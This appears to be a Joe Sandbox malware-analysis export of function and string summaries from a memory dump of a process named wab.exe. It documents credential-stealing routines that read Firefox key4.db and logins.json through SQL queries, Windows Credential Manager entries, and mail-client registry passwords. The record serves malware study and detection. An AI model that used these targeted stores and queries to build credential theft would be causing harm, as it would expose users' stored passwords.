                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          APIs
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                          • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad
                                          • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                          • API String ID: 2238633743-192783356
                                          Strings
                                          Similarity
                                          • API ID: PrivateProfileString_mbscmpstrlen
                                          • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                          • API String ID: 3963849919-1658304561
                                          Strings
                                          Similarity
                                          • API ID: ??2@??3@memcpymemset
                                          • String ID: (yE$(yE$(yE
                                          • API String ID: 1865533344-362086290
                                          APIs
                                          • memset.MSVCRT ref: 0040EBD8
                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                          • memset.MSVCRT ref: 0040EC2B
                                          • memset.MSVCRT ref: 0040EC47
                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                          • memset.MSVCRT ref: 0040ECDD
                                          • memset.MSVCRT ref: 0040ECF2
                                          • _mbscpy.MSVCRT ref: 0040ED59
                                          • _mbscpy.MSVCRT ref: 0040ED6F
                                          • _mbscpy.MSVCRT ref: 0040ED85
                                          • _mbscpy.MSVCRT ref: 0040ED9B
                                          • _mbscpy.MSVCRT ref: 0040EDB1
                                          • _mbscpy.MSVCRT ref: 0040EDC7
                                          • memset.MSVCRT ref: 0040EDE1
                                          Strings
                                          Similarity
                                          • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                          • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                          • API String ID: 3137614212-1455797042
                                          APIs
                                            • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                            • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                            • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                            • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                            • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                          • memset.MSVCRT ref: 0040E5B8
                                          • memset.MSVCRT ref: 0040E5CD
                                          • _mbscpy.MSVCRT ref: 0040E634
                                          • _mbscpy.MSVCRT ref: 0040E64A
                                          • _mbscpy.MSVCRT ref: 0040E660
                                          • _mbscpy.MSVCRT ref: 0040E676
                                          • _mbscpy.MSVCRT ref: 0040E68C
                                          • _mbscpy.MSVCRT ref: 0040E69F
                                          • memset.MSVCRT ref: 0040E6B5
                                          • memset.MSVCRT ref: 0040E6CC
                                            • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                            • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                          • memset.MSVCRT ref: 0040E736
                                          • memset.MSVCRT ref: 0040E74F
                                          • sprintf.MSVCRT ref: 0040E76D
                                          • sprintf.MSVCRT ref: 0040E788
                                          • _strcmpi.MSVCRT ref: 0040E79E
                                          • _strcmpi.MSVCRT ref: 0040E7B7
                                          • _strcmpi.MSVCRT ref: 0040E7D3
                                          • memset.MSVCRT ref: 0040E858
                                          • sprintf.MSVCRT ref: 0040E873
                                          • _strcmpi.MSVCRT ref: 0040E889
                                          • _strcmpi.MSVCRT ref: 0040E8A5
                                          Strings
                                          Similarity
                                          • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                          • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                          • API String ID: 4171719235-3943159138
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                          • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                          • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                          • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                          • GetWindowRect.USER32(?,?), ref: 00410487
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                          • GetDC.USER32 ref: 004104E2
                                          • strlen.MSVCRT ref: 00410522
                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                          • ReleaseDC.USER32(?,?), ref: 00410580
                                          • sprintf.MSVCRT ref: 00410640
                                          • SetWindowTextA.USER32(?,?), ref: 00410654
                                          • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                          • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                          • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                          • GetClientRect.USER32(?,?), ref: 004106DD
                                          • GetWindowRect.USER32(?,?), ref: 004106E7
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                          • GetClientRect.USER32(?,?), ref: 00410737
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                          Strings
                                          Similarity
                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                          • String ID: %s:$EDIT$STATIC
                                          • API String ID: 1703216249-3046471546
                                          APIs
                                          • memset.MSVCRT ref: 004024F5
                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                          • _mbscpy.MSVCRT ref: 00402533
                                          • _mbscpy.MSVCRT ref: 004025FD
                                          Strings
                                          Similarity
                                          • API ID: _mbscpy$QueryValuememset
                                          • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                          • API String ID: 168965057-606283353
                                          APIs
                                          • memset.MSVCRT ref: 00402869
                                            • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                          • _mbscpy.MSVCRT ref: 004028A3
                                            • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                          • _mbscpy.MSVCRT ref: 0040297B
                                            • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                          Strings
                                          Similarity
                                          • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                          • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                          • API String ID: 1497257669-167382505
                                          APIs
                                          • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                          • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                          • LoadCursorA.USER32(00000067), ref: 0040115F
                                          • SetCursor.USER32(00000000,?,?), ref: 00401166
                                          • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                          • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                          • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                          • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                          • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                          • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                          • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                          • EndDialog.USER32(?,00000001), ref: 0040121A
                                          • DeleteObject.GDI32(?), ref: 00401226
                                          • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                          • ShowWindow.USER32(00000000), ref: 00401253
                                          • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                          • ShowWindow.USER32(00000000), ref: 00401262
                                          • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                          • memset.MSVCRT ref: 0040128E
                                          • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                          • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                          Similarity
                                          • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                          • String ID:
                                          • API String ID: 2998058495-0
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                          • API String ID: 231171946-2189169393
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf$_mbscpy
                                          • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                          • API String ID: 633282248-1996832678
                                          APIs
                                          Strings
                                          • key4.db, xrefs: 00406756
                                          • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                          • , xrefs: 00406834
                                          • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memcmp$memsetstrlen
                                          • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                          • API String ID: 3614188050-3983245814
                                          • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                          • Instruction ID: f64da88478914857a13bd548ab7de8656dcb141f17a11f318e4dfa38f1e39988
                                          • Opcode Fuzzy Hash: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
                                          • Instruction Fuzzy Hash: 76A1C7B1A00215ABDB14EFA5D841BDFB3A8FF44308F11453BF515E7282E778EA548B98
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memsetsprintf$_mbscpy$FileWrite_mbscatstrlen
                                          • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                          • API String ID: 710961058-601624466
                                          • Opcode ID: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                          • Instruction ID: c58e6c37e7046e1a5f8c637d7d1376bb8f99d5739874c3f6ad91cefff1898c28
                                          • Opcode Fuzzy Hash: d99efe9fa263efa73d2f59ab46a5965583c80ed56cb3263ce5a85c5ce08305dc
                                          • Instruction Fuzzy Hash: 5F61BC31900258AFEF14DF58CC86E9E7B79EF08314F10019AF909AB1D2DB78AA51CB55
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: sprintf$memset$_mbscpy
                                          • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                          • API String ID: 3402215030-3842416460
                                          • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                          • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                          • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                          • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                          APIs
                                            • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                            • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                            • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                            • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                            • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                            • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                            • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                            • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                          • strlen.MSVCRT ref: 0040F139
                                          • strlen.MSVCRT ref: 0040F147
                                          • memset.MSVCRT ref: 0040F187
                                          • strlen.MSVCRT ref: 0040F196
                                          • strlen.MSVCRT ref: 0040F1A4
                                          • memset.MSVCRT ref: 0040F1EA
                                          • strlen.MSVCRT ref: 0040F1F9
                                          • strlen.MSVCRT ref: 0040F207
                                          • _strcmpi.MSVCRT ref: 0040F2B2
                                          • _mbscpy.MSVCRT ref: 0040F2CD
                                          • _mbscpy.MSVCRT ref: 0040F30E
                                            • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                            • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                          • String ID: logins.json$none$signons.sqlite$signons.txt
                                          • API String ID: 1613542760-3138536805
                                          • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                          • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                          • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                          • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                                          • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                          • API String ID: 1012775001-1343505058
                                          • Opcode ID: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                          • Instruction ID: 781a2e52d7f362fd39b5c74be6276a003a473a920a8a4abf0813dd90f66971c0
                                          • Opcode Fuzzy Hash: 67e53a8000507b2df1606981ac9655a9ff446d7e1ebb268b9dca7550b5d4ed50
                                          • Instruction Fuzzy Hash: F2417E72A01128AFEB21DB54CC85FDAB7BCEB4A300F5440EAF54DA7151DA34AA84CF65
                                          APIs
                                          • memset.MSVCRT ref: 00444612
                                            • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                                          • strlen.MSVCRT ref: 0044462E
                                          • memset.MSVCRT ref: 00444668
                                          • memset.MSVCRT ref: 0044467C
                                          • memset.MSVCRT ref: 00444690
                                          • memset.MSVCRT ref: 004446B6
                                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                                            • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                                          • memcpy.MSVCRT ref: 004446ED
                                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                                            • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                                            • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                                          • memcpy.MSVCRT ref: 00444729
                                          • memcpy.MSVCRT ref: 0044473B
                                          • _mbscpy.MSVCRT ref: 00444812
                                          • memcpy.MSVCRT ref: 00444843
                                          • memcpy.MSVCRT ref: 00444855
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpymemset$strlen$_mbscpy
                                          • String ID: salu
                                          • API String ID: 3691931180-4177317985
                                          • Opcode ID: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                          • Instruction ID: b87b4f34a2d3e3c1159852785770864cc269bb22f3616182f1b5584d27518a2a
                                          • Opcode Fuzzy Hash: 7aa0c36a908e154e1738134483ef229f790a3b7337559f89648c7b5d4c93b75e
                                          • Instruction Fuzzy Hash: 65713D7190015DAADB10EBA5CC81ADEB7B8FF44348F1444BAF648E7141DB38AB498F95
                                          APIs
                                          • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                          • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                          • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                          • API String ID: 2449869053-232097475
                                          • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                          • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                          • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                          • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                          APIs
                                          • sprintf.MSVCRT ref: 0040957B
                                          • LoadMenuA.USER32(?,?), ref: 00409589
                                            • Part of subcall function 004093B2: GetMenuItemCount.USER32(?), ref: 004093C7
                                            • Part of subcall function 004093B2: memset.MSVCRT ref: 004093E8
                                            • Part of subcall function 004093B2: GetMenuItemInfoA.USER32 ref: 00409423
                                            • Part of subcall function 004093B2: strchr.MSVCRT ref: 0040943A
                                          • DestroyMenu.USER32(00000000), ref: 004095A7
                                          • sprintf.MSVCRT ref: 004095EB
                                          • CreateDialogParamA.USER32(?,00000000,00000000,00409555,00000000), ref: 00409600
                                          • memset.MSVCRT ref: 0040961C
                                          • GetWindowTextA.USER32(00000000,?,00001000), ref: 0040962D
                                          • EnumChildWindows.USER32(00000000,Function_000094A2,00000000), ref: 00409655
                                          • DestroyWindow.USER32(00000000), ref: 0040965C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: Menu$DestroyItemWindowmemsetsprintf$ChildCountCreateDialogEnumInfoLoadParamTextWindowsstrchr
                                          • String ID: caption$dialog_%d$menu_%d
                                          • API String ID: 3259144588-3822380221
                                          • Opcode ID: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                          • Instruction ID: e9c2f3b5cfdd7c6c8f350bf48a14ef17ef5fca4d90bdc7cc97d58e5e48f5f72a
                                          • Opcode Fuzzy Hash: 12c6f4339fc5c8bf88ab30013b8ff134b6349a0731f33ab17c19a0bdce29f0c3
                                          • Instruction Fuzzy Hash: 5C212672901288BFDB129F509C81EAF3768FB09305F044076FA01A1192E7B99D548B6E
                                          APIs
                                            • Part of subcall function 00404656: FreeLibrary.KERNEL32(?,004045E3,?,0040F708,?,00000000), ref: 0040465D
                                          • LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                          • GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                          • GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                          • GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                          • GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                          • GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: AddressProc$Library$FreeLoad
                                          • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                          • API String ID: 2449869053-4258758744
                                          • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                          • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                          • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                          • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                          APIs
                                          • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                          • memset.MSVCRT ref: 0040F84A
                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                          • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                          • LocalFree.KERNEL32(?), ref: 0040F92C
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                          • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                          • String ID: Creds$ps:password
                                          • API String ID: 551151806-1872227768
                                          • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                          • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                          • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                          • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                          APIs
                                          • wcsstr.MSVCRT ref: 0040426A
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                          • _mbscpy.MSVCRT ref: 004042D5
                                          • _mbscpy.MSVCRT ref: 004042E8
                                          • strchr.MSVCRT ref: 004042F6
                                          • strlen.MSVCRT ref: 0040430A
                                          • sprintf.MSVCRT ref: 0040432B
                                          • strchr.MSVCRT ref: 0040433C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                          • String ID: %s@gmail.com$www.google.com
                                          • API String ID: 3866421160-4070641962
                                          • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                          • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                          • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                          • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                          APIs
                                          • _mbscpy.MSVCRT ref: 00409749
                                          • _mbscpy.MSVCRT ref: 00409759
                                            • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                            • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                            • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                          • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                          • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                          • _mbscpy.MSVCRT ref: 004097A1
                                          • memset.MSVCRT ref: 004097BD
                                          • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
